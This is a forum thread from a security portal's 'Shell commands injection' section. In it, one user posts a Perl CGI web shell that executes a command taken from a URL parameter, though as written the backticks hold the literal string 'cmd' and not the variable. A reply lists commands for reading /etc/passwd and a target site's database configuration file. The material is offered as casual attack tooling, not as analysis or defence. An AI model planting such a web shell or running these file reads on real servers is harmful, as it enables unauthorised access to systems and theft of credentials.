Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 29, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 785
Members: 0
Total: 785
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Shell commands injection -> backtick fun i guess...
Post new topic  Reply to topic View previous topic :: View next topic 
backtick fun i guess...
PostPosted: Tue Nov 30, 2004 10:04 am Reply with quote
VTEC
Beginner
Beginner
 
Joined: Nov 30, 2004
Posts: 2




here is for when you are bored to death.
Code:
#!/usr/bin/perl
use CGI qw(param);
$cmd = param("cmd");
$res = `cmd`;
$res =~ s/textarea/TEzTARoA/gi;
print "Content-Type: text/html\n\n";
print "<HTML><FORM><INPUT TYPE=text name=cmd></form>";
if ($cmd ne ""){
print "<HTML><FORM><textarea rows=35 cols35>$res</textarea></FORM>";
}

good commands are
Code:

cd = duh
ls=list files
ls -a list ALL files
copy x:x
cat filename.ext = will source ANY PAGE

have fun
-v5
View user's profile Send private message
PostPosted: Sun Jul 30, 2006 9:50 am Reply with quote
Zipper_
Active user
Active user
 
Joined: Aug 03, 2005
Posts: 29




Code:
cat /etc/passwd - webservers users list
cat ./../mainfile.php - lists targets db config

couple more commands for you
View user's profile Send private message
backtick fun i guess...
  www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.115 Seconds